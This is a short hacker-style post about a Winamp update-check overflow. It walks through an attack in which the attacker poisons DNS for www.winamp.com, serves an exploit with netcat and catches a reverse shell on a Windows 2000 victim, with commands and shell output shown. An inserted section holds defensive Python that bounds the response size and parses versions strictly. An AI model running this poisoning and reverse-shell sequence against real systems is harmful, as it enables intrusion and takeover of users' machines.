
How to hack through winamp

How Hackers Take over Through Winamp!!


Winamp has an option, enabled by default, which on startup checks www.winamp.com for the latest version and then notifies the user of a possible upgrade via a message box.


Unfortunately, if it receives a huge response, the thread parsing the data is thrown into an infinite loop and eventually the exception dispatcher is called, and then, as so often under Windows, a big, bad overflow occurs. A real example is attached below.
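The defect the post describes is an update check that reads a reply from whatever host the resolver hands it and parses that reply with no upper bound on its size. The following added example (not Winamp's code and not from this post; the response format, the 4096-byte limit and the sample replies are assumptions) shows the shape of a version check that a defender would want instead: the read loop stops as soon as the reply exceeds a fixed limit, and the parser only accepts a well-formed version string, so an oversized or non-version reply is rejected rather than looped over.

```python
import re
import socket

# Hard upper bound on the bytes an update check will accept (assumed value).
# A real version string is a few bytes; anything far larger is not a version answer.
MAX_RESPONSE_BYTES = 4096

# Accept only "major.minor" or "major.minor.patch", each part 1-3 digits.
VERSION_RE = re.compile(rb"^(\d{1,3})\.(\d{1,3})(?:\.(\d{1,3}))?$")


class ResponseTooLarge(ValueError):
    """Raised when the server sends more than MAX_RESPONSE_BYTES."""


def read_bounded(sock, limit=MAX_RESPONSE_BYTES, chunk=1024):
    """Read a response until EOF, but abort as soon as it exceeds `limit`.

    The loop is bounded by `limit`, so an endless or oversized reply cannot
    keep the parser busy or grow the buffer without limit.
    """
    buf = bytearray()
    while True:
        piece = sock.recv(chunk)
        if not piece:                     # EOF: server closed the connection
            return bytes(buf)
        buf += piece
        if len(buf) > limit:
            raise ResponseTooLarge(f"update response exceeded {limit} bytes")


def parse_version(body, limit=MAX_RESPONSE_BYTES):
    """Return (major, minor, patch) from the first line of `body`, or None.

    Rejects oversized bodies and anything that is not a plain version string
    (for example an HTML page returned by a host that is not the real server).
    """
    if len(body) > limit:
        raise ResponseTooLarge(f"update response exceeded {limit} bytes")
    first_line = body.split(b"\n", 1)[0].strip()
    match = VERSION_RE.match(first_line)
    if match is None:
        return None
    major, minor, patch = match.groups()
    return (int(major), int(minor), int(patch) if patch is not None else 0)


def newer_version_available(current, body):
    """True only if `body` parses as a well-formed version newer than `current`."""
    latest = parse_version(body)
    if latest is None:
        return False
    return latest > tuple(current)


def simulate_response(payload, limit=MAX_RESPONSE_BYTES):
    """Feed `payload` through a local socket pair and run read_bounded on it.

    Returns the bytes read, or raises ResponseTooLarge. This stands in for the
    network so the reader can be exercised offline.
    """
    client, server = socket.socketpair()
    try:
        server.sendall(payload)
        server.close()
        return read_bounded(client, limit)
    finally:
        client.close()


# Constructed sample responses (not captured from any real server).
GOOD_RESPONSE = b"2.91\r\nThanks for using the client\r\n"
HTML_RESPONSE = b"<html><body>not a version</body></html>\r\n"
HUGE_RESPONSE = b"A" * 100_000          # the "huge response" case from the post

if __name__ == "__main__":
    print(parse_version(GOOD_RESPONSE))            # (2, 91, 0)
    print(parse_version(HTML_RESPONSE))            # None
    try:
        parse_version(HUGE_RESPONSE)
    except ResponseTooLarge as exc:
        print("rejected:", exc)
```

The size bound removes the crash, but it does not fix the other half of the scenario: the client still trusts whatever host the resolver returns. That part needs an authenticated channel (TLS with certificate checking, or a signed update manifest) so that a poisoned answer cannot substitute its own server.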


Sample attack
=============

Nameserver - 192.168.0.1
attacker - 192.168.1.2
victim (windows machine) - 192.168.0.2

1) attacker poisons nameserver cache

192.168.1.2:
x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2

2) victim is now resolving www.winamp.com to attacker machine

192.168.0.2:
C:\>nslookup www.winamp.com
Server: z3.names.int
Address: 192.168.0.1

Name: www.winamp.com
Address: 192.168.1.2

3) attacker fires up exploit as web daemon

192.168.1.2:
x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80

4) attacker waits for connect-back by exploit

192.168.1.2:
x@x:~$ nc -l -p 5555

5) foolish winamp user opens winamp!

192.168.0.2:
opens winamp, prepares for The Weather Girls - It's Raining Men.mp3

6) BOOJAH!@

192.168.1.2:
x@x:~$ nc -l -p 5555
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>

/// control over machine taken